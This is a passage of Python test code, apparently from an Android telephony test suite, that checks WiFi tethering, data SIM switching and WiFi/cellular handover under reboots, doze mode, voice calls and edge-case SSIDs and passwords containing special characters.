time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering not stopped.")
return False
if verify_http_connection(self.log, ads[1]):
self.log.error("Client should not have Internet connection.")
return False
wifi_info = ads[1].droid.wifiGetConnectionInfo()
self.log.info("WiFi Info: {}".format(wifi_info))
if wifi_info[WifiEnums.SSID_KEY] == ssid:
self.log.error(
"WiFi error. WiFi should not be connected.".format(
wifi_info))
return False
self.log.info("Provider turn off APM.")
if not toggle_airplane_mode(self.log, ads[0], False):
self.log.error("Provider turn on APM failed.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering should not on.")
return False
if not verify_http_connection(self.log, ads[0]):
self.log.error("Provider should have Internet connection.")
return False
finally:
ads[1].droid.telephonyToggleDataConnection(True)
WifiUtils.wifi_reset(self.log, ads[1])
return True
@TelephonyBaseTest.tel_test_wrap
def test_tethering_entitlement_check(self):
"""Tethering Entitlement Check Test
Get tethering entitlement check result.
Returns:
True if entitlement check returns True.
"""
ad = self.android_devices[0]
result = ad.droid.carrierConfigIsTetheringModeAllowed(
TETHERING_MODE_WIFI, MAX_WAIT_TIME_TETHERING_ENTITLEMENT_CHECK)
self.log.info("{} tethering entitlement check result: {}.".format(
ad.serial, result))
return result
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_2gwifi_stress(self):
"""Stress Test LTE to WiFI 2.4G Tethering
This is a stress test for "test_tethering_4g_to_2gwifi".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
if self.test_tethering_4g_to_2gwifi():
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_ssid_quotes(self):
"""WiFi Tethering test: SSID name have quotes.
1. Set SSID name have double quotes.
2. Start LTE to WiFi (2.4G) tethering.
3. Verify tethering.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
ssid = "\"" + rand_ascii_str(10) + "\""
self.log.info("Starting WiFi Tethering test with ssid: {}".format(
ssid))
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10,
ssid=ssid)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_password_escaping_characters(self):
"""WiFi Tethering test: password have escaping characters.
1. Set password have escaping characters.
e.g.: '"DQ=/{Yqq;M=(^_3HzRvhOiL8S%`]w&l<Qp8qH)bs<4E9v_q=HLr^)}w$blA0Kg'
2. Start LTE to WiFi (2.4G) tethering.
3. Verify tethering.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
password = '"DQ=/{Yqq;M=(^_3HzRvhOiL8S%`]w&l<Qp8qH)bs<4E9v_q=HLr^)}w$blA0Kg'
self.log.info("Starting WiFi Tethering test with password: {}".format(
password))
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10,
password=password)
def _test_start_wifi_tethering_connect_teardown(self, ad_host, ad_client,
ssid, password):
"""Private test util for WiFi Tethering.
1. Host start WiFi tethering.
2. Client connect to tethered WiFi.
3. Host tear down WiFi tethering.
Args:
ad_host: android device object for host
ad_client: android device object for client
ssid: WiFi tethering ssid
password: WiFi tethering password
Returns:
True if no error happen, otherwise False.
"""
result = True
# Turn off active SoftAP if any.
if ad_host.droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ad_host)
time.sleep(WAIT_TIME_ANDROID_STATE_SETTLING)
if not WifiUtils.start_wifi_tethering(self.log, ad_host, ssid,
password,
WifiUtils.WIFI_CONFIG_APBAND_2G):
self.log.error("Provider start WiFi tethering failed.")
result = False
time.sleep(WAIT_TIME_ANDROID_STATE_SETTLING)
if not ensure_wifi_connected(self.log, ad_client, ssid, password):
self.log.error("Client connect to WiFi failed.")
result = False
if not WifiUtils.wifi_reset(self.log, ad_client):
self.log.error("Reset client WiFi failed. {}".format(
ad_client.serial))
result = False
if not WifiUtils.stop_wifi_tethering(self.log, ad_host):
self.log.error("Provider strop WiFi tethering failed.")
result = False
return result
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_ssid(self):
"""WiFi Tethering test: start WiFi tethering with all kinds of SSIDs.
For each listed SSID, start WiFi tethering on DUT, client connect WiFi,
then tear down WiFi tethering.
Returns:
True if WiFi tethering succeed on all SSIDs.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Setup Failed.")
return False
ssid_list = [" !\"#$%&'()*+,-./0123456789:;<=>?",
"@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_",
"`abcdefghijklmnopqrstuvwxyz{|}~", " a ", "!b!", "#c#",
"$d$", "%e%", "&f&", "'g'", "(h(", ")i)", "*j*", "+k+",
"-l-", ".m.", "/n/", "_",
" !\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}",
"\u0644\u062c\u0648\u062c", "\u8c37\u6b4c", "\uad6c\uae00"
"\u30b0\u30fc\u30eb",
"\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0443\u0439"]
fail_list = {}
for ssid in ssid_list:
password = rand_ascii_str(8)
self.log.info("SSID: <{}>, Password: <{}>".format(ssid, password))
if not self._test_start_wifi_tethering_connect_teardown(
ads[0], ads[1], ssid, password):
fail_list[ssid] = password
if (len(fail_list) > 0):
self.log.error("Failed cases: {}".format(fail_list))
return False
else:
return True
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_password(self):
"""WiFi Tethering test: start WiFi tethering with all kinds of passwords.
For each listed password, start WiFi tethering on DUT, client connect WiFi,
then tear down WiFi tethering.
Returns:
True if WiFi tethering succeed on all passwords.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Setup Failed.")
return False
password_list = [
" !\"#$%&'()*+,-./0123456789:;<=>?",
"@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_",
"`abcdefghijklmnopqrstuvwxyz{|}~",
" !\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}", "abcdefgh",
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!",
" a12345 ", "!b12345!", "#c12345#", "$d12345$", "%e12345%",
"&f12345&", "'g12345'", "(h12345(", ")i12345)", "*j12345*",
"+k12345+", "-l12345-", ".m12345.", "/n12345/"
]
fail_list = {}
for password in password_list:
result = True
ssid = rand_ascii_str(8)
self.log.info("SSID: <{}>, Password: <{}>".format(ssid, password))
if not self._test_start_wifi_tethering_connect_teardown(
ads[0], ads[1], ssid, password):
fail_list[ssid] = password
if (len(fail_list) > 0):
self.log.error("Failed cases: {}".format(fail_list))
return False
else:
return True
def _test_tethering_wifi_and_voice_call(
self, provider, client, provider_data_rat, provider_setup_func,
provider_in_call_check_func):
if not self._test_setup_tethering(
[provider, client], provider_data_rat):
self.log.error("Verify 4G Internet access failed.")
return False
tasks = [(provider_setup_func, (self.log, provider)),
(phone_setup_voice_general, (self.log, client))]
if not multithread_func(self.log, tasks):
self.log.error("Phone Failed to Set Up VoLTE.")
return False
try:
self.log.info("1. Setup WiFi Tethering.")
if not wifi_tethering_setup_teardown(
self.log,
provider,
[client],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
self.log.info("2. Make outgoing call.")
if not call_setup_teardown(
self.log,
provider,
client,
ad_hangup=None,
verify_caller_func=provider_in_call_check_func):
self.log.error("Setup Call Failed.")
return False
self.log.info("3. Verify data.")
if not verify_http_connection(self.log, provider):
self.log.error("Provider have no Internet access.")
if not verify_http_connection(self.log, client):
self.log.error("Client have no Internet access.")
hangup_call(self.log, provider)
time.sleep(WAIT_TIME_BETWEEN_REG_AND_CALL)
self.log.info("4. Make incoming call.")
if not call_setup_teardown(
self.log,
client,
provider,
ad_hangup=None,
verify_callee_func=provider_in_call_check_func):
self.log.error("Setup Call Failed.")
return False
self.log.info("5. Verify data.")
if not verify_http_connection(self.log, provider):
self.log.error("Provider have no Internet access.")
if not verify_http_connection(self.log, client):
self.log.error("Client have no Internet access.")
hangup_call(self.log, provider)
finally:
if not wifi_tethering_cleanup(self.log, provider, [client]):
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_volte_call(self):
"""WiFi Tethering test: VoLTE call during WiFi tethering
1. Start LTE to WiFi (2.4G) tethering.
2. Verify tethering.
3. Make outgoing VoLTE call on tethering provider.
4. Verify tethering still works.
5. Make incoming VoLTE call on tethering provider.
6. Verify tethering still works.
Returns:
True if success.
False if failed.
"""
return self._test_tethering_wifi_and_voice_call(
self.android_devices[0], self.android_devices[1], RAT_4G,
phone_setup_volte, is_phone_in_call_volte)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_csfb_call(self):
"""WiFi Tethering test: CSFB call during WiFi tethering
1. Start LTE to WiFi (2.4G) tethering.
2. Verify tethering.
3. Make outgoing CSFB call on tethering provider.
4. Verify tethering still works.
5. Make incoming CSFB call on tethering provider.
6. Verify tethering still works.
Returns:
True if success.
False if failed.
"""
return self._test_tethering_wifi_and_voice_call(
self.android_devices[0], self.android_devices[1], RAT_4G,
phone_setup_csfb, is_phone_in_call_csfb)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_3g_call(self):
"""WiFi Tethering test: 3G call during WiFi tethering
1. Start 3G to WiFi (2.4G) tethering.
2. Verify tethering.
3. Make outgoing CS call on tethering provider.
4. Verify tethering still works.
5. Make incoming CS call on tethering provider.
6. Verify tethering still works.
Returns:
True if success.
False if failed.
"""
return self._test_tethering_wifi_and_voice_call(
self.android_devices[0], self.android_devices[1], RAT_3G,
phone_setup_voice_3g, is_phone_in_call_3g)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_no_password(self):
"""WiFi Tethering test: Start WiFi tethering with no password
1. DUT is idle.
2. DUT start 2.4G WiFi Tethering, with no WiFi password.
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10,
password="")
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_reboot(self):
"""WiFi Tethering test: Start WiFi tethering then Reboot device
1. DUT is idle.
2. DUT start 2.4G WiFi Tethering.
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Reboot DUT
6. After DUT reboot, verify tethering is stopped.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Reboot DUT:{}".format(ads[0].serial))
ads[0].reboot()
time.sleep(WAIT_TIME_AFTER_REBOOT +
WAIT_TIME_TETHERING_AFTER_REBOOT)
self.log.info("After reboot check if tethering stopped.")
if ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering did NOT stopped.")
return False
finally:
ads[1].droid.telephonyToggleDataConnection(True)
WifiUtils.wifi_reset(self.log, ads[1])
if ads[0].droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ads[0])
return True
@TelephonyBaseTest.tel_test_wrap
def test_connect_wifi_start_tethering_wifi_reboot(self):
"""WiFi Tethering test: WiFI connected, then start WiFi tethering,
then reboot device.
Initial Condition: DUT in 4G mode, idle, DUT connect to WiFi.
1. DUT start 2.4G WiFi Tethering.
2. PhoneB disable data, connect to DUT's softAP
3. Verify Internet access on DUT and PhoneB
4. Reboot DUT
5. After DUT reboot, verify tethering is stopped. DUT is able to connect
to previous WiFi AP.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
self.log.info("Make sure DUT can connect to live network by WIFI")
if ((not ensure_wifi_connected(self.log, ads[0],
self.wifi_network_ssid,
self.wifi_network_pass)) or
(not verify_http_connection(self.log, ads[0]))):
self.log.error("WiFi connect fail.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Reboot DUT:{}".format(ads[0].serial))
ads[0].reboot()
time.sleep(WAIT_TIME_AFTER_REBOOT)
time.sleep(WAIT_TIME_TETHERING_AFTER_REBOOT)
self.log.info("After reboot check if tethering stopped.")
if ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering did NOT stopped.")
return False
self.log.info("Make sure WiFi can connect automatically.")
if (not wait_for_wifi_data_connection(self.log, ads[0], True) or
not verify_http_connection(self.log, ads[0])):
self.log.error("Data did not return to WiFi")
return False
finally:
ads[1].droid.telephonyToggleDataConnection(True)
WifiUtils.wifi_reset(self.log, ads[1])
if ads[0].droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ads[0])
return True
@TelephonyBaseTest.tel_test_wrap
def test_connect_wifi_reboot_start_tethering_wifi(self):
"""WiFi Tethering test: DUT connected to WiFi, then reboot,
After reboot, start WiFi tethering, verify tethering actually works.
Initial Condition: Device set to 4G mode, idle, DUT connect to WiFi.
1. Verify Internet is working on DUT (by WiFi).
2. Reboot DUT.
3. DUT start 2.4G WiFi Tethering.
4. PhoneB disable data, connect to DUT's softAP
5. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
self.log.info("Make sure DUT can connect to live network by WIFI")
if ((not ensure_wifi_connected(self.log, ads[0],
self.wifi_network_ssid,
self.wifi_network_pass)) or
(not verify_http_connection(self.log, ads[0]))):
self.log.error("WiFi connect fail.")
return False
self.log.info("Reboot DUT:{}".format(ads[0].serial))
ads[0].reboot()
time.sleep(WAIT_TIME_AFTER_REBOOT)
time.sleep(WAIT_TIME_TETHERING_AFTER_REBOOT)
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_wifi_screen_off_enable_doze_mode(self):
"""WiFi Tethering test: Start WiFi tethering, then turn off DUT's screen,
then enable doze mode.
1. Start WiFi tethering on DUT.
2. PhoneB disable data, and connect to DUT's softAP
3. Verify Internet access on DUT and PhoneB
4. Turn off DUT's screen. Wait for 1 minute and
verify Internet access on Client PhoneB.
5. Enable doze mode on DUT. Wait for 1 minute and
verify Internet access on Client PhoneB.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Turn off screen on provider: <{}>.".format(ads[
0].serial))
ads[0].droid.goToSleepNow()
time.sleep(60)
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client have no Internet access.")
return False
self.log.info("Enable doze mode on provider: <{}>.".format(ads[
0].serial))
if not enable_doze(ads[0]):
self.log.error("Failed to enable doze mode.")
return False
time.sleep(60)
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client have no Internet access.")
return False
finally:
self.log.info("Disable doze mode.")
if not disable_doze(ads[0]):
self.log.error("Failed to disable doze mode.")
return False
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_msim_switch_data_sim_2g(self):
"""Switch Data SIM on 2G network.
Steps:
1. Data on default Data SIM.
2. Switch Data to another SIM. Make sure data is still available.
3. Switch Data back to previous SIM. Make sure data is still available.
Expected Results:
1. Verify Data on Cell
2. Verify Data on Wifi
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
current_data_sub_id = ad.droid.subscriptionGetDefaultDataSubId()
current_sim_slot_index = get_slot_index_from_subid(self.log, ad,
current_data_sub_id)
if current_sim_slot_index == SIM1_SLOT_INDEX:
next_sim_slot_index = SIM2_SLOT_INDEX
else:
next_sim_slot_index = SIM1_SLOT_INDEX
next_data_sub_id = get_subid_from_slot_index(self.log, ad,
next_sim_slot_index)
self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
current_data_sub_id, current_sim_slot_index))
if not ensure_network_generation_for_subscription(
self.log, ad, ad.droid.subscriptionGetDefaultDataSubId(), GEN_2G,
voice_or_data=NETWORK_SERVICE_DATA):
self.log.error("Device data does not attach to 2G.")
return False
if not verify_http_connection(self.log, ad):
self.log.error("No Internet access on default Data SIM.")
return False
self.log.info("Change Data to subId: {}, SIM slot: {}".format(
next_data_sub_id, next_sim_slot_index))
if not change_data_sim_and_verify_data(self.log, ad, next_sim_slot_index):
self.log.error("Failed to change data SIM.")
return False
next_data_sub_id = current_data_sub_id
next_sim_slot_index = current_sim_slot_index
self.log.info("Change Data back to subId: {}, SIM slot: {}".format(
next_data_sub_id, next_sim_slot_index))
if not change_data_sim_and_verify_data(self.log, ad, next_sim_slot_index):
self.log.error("Failed to change data SIM.")
return False
return True
def _test_wifi_connect_disconnect(self):
"""Perform multiple connects and disconnects from WiFi and verify that
data switches between WiFi and Cell.
Steps:
1. Reset Wifi on DUT
2. Connect DUT to a WiFi AP
3. Repeat steps 1-2, alternately disconnecting and disabling wifi
Expected Results:
1. Verify Data on Cell
2. Verify Data on Wifi
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
wifi_toggles = [True, False, True, False, False, True, False, False,
False, False, True, False, False, False, False, False,
False, False, False]
for toggle in wifi_toggles:
WifiUtils.wifi_reset(self.log, ad, toggle)
if not wait_for_cell_data_connection(
self.log, ad, True, MAX_WAIT_TIME_WIFI_CONNECTION):
self.log.error("Failed wifi connection, aborting!")
return False
if not verify_http_connection(self.log, ad,
'http://www.google.com', 100, .1):
self.log.error("Failed to get user-plane traffic, aborting!")
return False
if toggle:
WifiUtils.wifi_toggle_state(self.log, ad, True)
WifiUtils.wifi_connect(self.log, ad, self.wifi_network_ssid,
self.wifi_network_pass)
if not wait_for_wifi_data_connection(
self.log, ad, True, MAX_WAIT_TIME_WIFI_CONNECTION):
self.log.error("Failed wifi connection, aborting!")
return False
if not verify_http_connection(self.log, ad,
'http://www.google.com', 100, .1):
self.log.error("Failed to get user-plane traffic, aborting!")
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_wifi_connect_disconnect_4g(self):
"""Perform multiple connects and disconnects from WiFi and verify that
data switches between WiFi and Cell.
Steps:
1. DUT Cellular Data is on 4G. Reset Wifi on DUT
2. Connect DUT to a WiFi AP
3. Repeat steps 1-2, alternately disconnecting and disabling wifi
Expected Results:
1. Verify Data on Cell
2. Verify Data on Wifi
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
if not ensure_network_generation_for_subscription(self.log, ad,
ad.droid.subscriptionGetDefaultDataSubId(), GEN_4G,
MAX_WAIT_TIME_NW_SELECTION, NETWORK_SERVICE_DATA):
self.log.error("Device {} failed to reselect in {}s.".format(
ad.serial, MAX_WAIT_TIME_NW_SELECTION))
return False
return self._test_wifi_connect_disconnect()
@TelephonyBaseTest.tel_test_wrap
def test_wifi_connect_disconnect_3g(self):
"""Perform multiple connects and disconnects from WiFi and verify that
data switches between WiFi and Cell.
Steps:
1. DUT Cellular Data is on 3G. Reset Wifi on DUT
2. Connect DUT to a WiFi AP
3. Repeat steps 1-2, alternately disconnecting and disabling wifi
Expected Results:
1. Verify Data on Cell
2. Verify Data on Wifi
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
if not ensure_network_generation_for_subscription(self.log, ad,
ad.droid.subscriptionGetDefaultDataSubId(), GEN_3G,
MAX_WAIT_TIME_NW_SELECTION, NETWORK_SERVICE_DATA):
self.log.error("Device {} failed to reselect in {}s.".format(
ad.serial, MAX_WAIT_TIME_NW_SELECTION))
return False
return self._test_wifi_connect_disconnect()
@TelephonyBaseTest.tel_test_wrap
def test_wifi_connect_disconnect_2g(self):
"""Perform multiple connects and disconnects from WiFi and verify that
data switches between WiFi and Cell.
Steps:
1. DUT Cellular Data is on 2G. Reset Wifi on DUT
2. Connect DUT to a WiFi AP
3. Repeat steps 1-2, alternately disconnecting and disabling wifi
Expected Results:
1. Verify Data on Cell
2. Verify Data on Wifi
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
if not ensure_network_generation_for_subscription(self.log, ad,
ad.droid.subscriptionGetDefaultDataSubId(), GEN_2G,
MAX_WAIT_TIME_NW_SELECTION, NETWORK_SERVICE_DATA):
self.log.error("Device {} failed to reselect in {}s.".format(
ad.serial, MAX_WAIT_TIME_NW_SELECTION))
return False
return self._test_wifi_connect_disconnect()
def _test_wifi_tethering_enabled_add_voice_call(self, network_generation,
voice_call_direction, is_data_available_during_call):
"""Tethering enabled + voice call.
Steps:
1. DUT data is on <network_generation>. Start WiFi Tethering.
2. PhoneB connect to DUT's softAP
3. DUT make a MO/MT (<voice_call_direction>) phone call.
4. DUT end phone call.
Expected Results:
1. DUT is able to start WiFi tethering.
2. PhoneB connected to DUT's softAP and able to browse Internet.
3. DUT WiFi tethering is still on. Phone call works OK.
If is_data_available_during_call is True, then PhoneB still has
Internet access.
Else, then Data is suspend, PhoneB has no Internet access.
4. WiFi Tethering still on, voice call stopped, and PhoneB have Internet
access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, network_generation):
self.log.error("Verify Internet access failed.")
return False
try:
# Start WiFi Tethering
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
# Make a voice call
if voice_call_direction == DIRECTION_MOBILE_ORIGINATED:
ad_caller = ads[0]
ad_callee = ads[1]
else:
ad_caller = ads[1]
ad_callee = ads[0]
if not call_setup_teardown(self.log, ad_caller, ad_callee, None,
None, None):
self.log.error("Failed to Establish {} Voice Call".format(
voice_call_direction))
return False
# Tethering should still be on.
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
if not is_data_available_during_call:
if verify_http_connection(self.log, ads[1], retry=0):
self.log.error("Client should not have Internet Access.")
return False
else:
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client should have Internet Access.")
return False
# Hangup call. Client should have data.
if not hangup_call(self.log, ads[0]):
self.log.error("Failed to hang up call")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client should have Internet Access.")
return False
finally:
ads[1].droid.telephonyToggleDataConnection(True)
WifiUtils.wifi_reset(self.log, ads[1])
if ads[0].droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ads[0])
return True
@TelephonyBaseTest.tel_test_wrap
def test_wifi_tethering_enabled_add_mo_voice_call_2g_dsds(self):
"""Tethering enabled + voice call
Steps:
1. DUT is DSDS device, Data on 2G. Start WiFi Tethering on <Data SIM>
2. PhoneB connect to DUT's softAP
3. DUT make a mo phone call on <Voice SIM>
4. DUT end phone call.
Expected Results:
1. DUT is able to start WiFi tethering.
2. PhoneB connected to DUT's softAP and able to browse Internet.
3. DUT WiFi tethering is still on. Phone call works OK. Data is suspend,
PhoneB still connected to DUT's softAP, but no data available.
4. DUT data resumes, and PhoneB have Internet access.
Returns:
True if success.
False if failed.
"""
return self._test_wifi_tethering_enabled_add_voice_call(GEN_2G,
DIRECTION_MOBILE_ORIGINATED, False)
@TelephonyBaseTest.tel_test_wrap
def test_wifi_tethering_enabled_add_mt_voice_call_2g_dsds(self):
"""Tethering enabled + voice call
Steps:
1. DUT is DSDS device, Data on 2G. Start WiFi Tethering on <Data SIM>
2. PhoneB connect to DUT's softAP
3. DUT make a mt phone call on <Voice SIM>
4. DUT end phone call.
Expected Results:
1. DUT is able to start WiFi tethering.
2. PhoneB connected to DUT's softAP and able to browse Internet.
3. DUT WiFi tethering is still on. Phone call works OK. Data is suspend,
PhoneB still connected to DUT's softAP, but no data available.
4. DUT data resumes, and PhoneB have Internet access.
Returns:
True if success.
False if failed.
"""
return self._test_wifi_tethering_enabled_add_voice_call(GEN_2G,
DIRECTION_MOBILE_TERMINATED, False)
@TelephonyBaseTest.tel_test_wrap
def test_wifi_tethering_msim_switch_data_sim(self):
"""Tethering enabled + switch data SIM.
Steps:
1. Start WiFi Tethering on <Default Data SIM>
2. PhoneB connect to DUT's softAP
3. DUT change Default Data SIM.
Expected Results:
1. DUT is able to start WiFi tethering.
2. PhoneB connected to DUT's softAP and able to browse Internet.
3. DUT Data changed to 2nd SIM, WiFi tethering should continues,
PhoneB should have Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
current_data_sub_id = ads[0].droid.subscriptionGetDefaultDataSubId()
current_sim_slot_index = get_slot_index_from_subid(self.log, ads[0],
current_data_sub_id)
self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
current_data_sub_id, current_sim_slot_index))
if not self._test_setup_tethering(ads):
self.log.error("Verify Internet access failed.")
return False
try:
# Start WiFi Tethering
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
for i in range(0, 2):
next_sim_slot_index = \
{SIM1_SLOT_INDEX : SIM2_SLOT_INDEX,
SIM2_SLOT_INDEX : SIM1_SLOT_INDEX}[current_sim_slot_index]
self.log.info("Change Data to SIM slot: {}".
format(next_sim_slot_index))
if not change_data_sim_and_verify_data(self.log, ads[0],
next_sim_slot_index):
self.log.error("Failed to change data SIM.")
return False
current_sim_slot_index = next_sim_slot_index
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client should have Internet Access.")
return False
finally:
ads[1].droid.telephonyToggleDataConnection(True)
WifiUtils.wifi_reset(self.log, ads[1])
if ads[0].droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ads[0])
return True
@TelephonyBaseTest.tel_test_wrap
def test_msim_cell_data_switch_to_wifi_switch_data_sim_2g(self):
"""Switch Data SIM on 2G network.
Steps:
1. Data on default Data SIM.
2. Turn on WiFi, then data should be on WiFi.
3. Switch Data to another SIM. Disable WiFi.
Expected Results:
1. Verify Data on Cell
2. Verify Data on WiFi
3. After WiFi disabled, Cell Data is available on 2nd SIM.
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
current_data_sub_id = ad.droid.subscriptionGetDefaultDataSubId()
current_sim_slot_index = get_slot_index_from_subid(self.log, ad,
current_data_sub_id)
if current_sim_slot_index == SIM1_SLOT_INDEX:
next_sim_slot_index = SIM2_SLOT_INDEX
else:
next_sim_slot_index = SIM1_SLOT_INDEX
next_data_sub_id = get_subid_from_slot_index(self.log, ad,
next_sim_slot_index)
self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
current_data_sub_id, current_sim_slot_index))
if not ensure_network_generation_for_subscription(
self.log,
ad,
ad.droid.subscriptionGetDefaultDataSubId(),
GEN_2G,
voice_or_data=NETWORK_SERVICE_DATA):
self.log.error("Device data does not attach to 2G.")
return False
if not verify_http_connection(self.log, ad):
self.log.error("No Internet access on default Data SIM.")
return False
self.log.info("Connect to WiFi and verify Internet access.")
if not ensure_wifi_connected(self.log, ad, self.wifi_network_ssid,
self.wifi_network_pass):
self.log.error("WiFi connect fail.")
return False
if (not wait_for_wifi_data_connection(self.log, ad, True) or
not verify_http_connection(self.log, ad)):
self.log.error("Data is not on WiFi")
return False
try:
self.log.info(
"Change Data SIM, Disable WiFi and verify Internet access.")
set_subid_for_data(ad, next_data_sub_id)
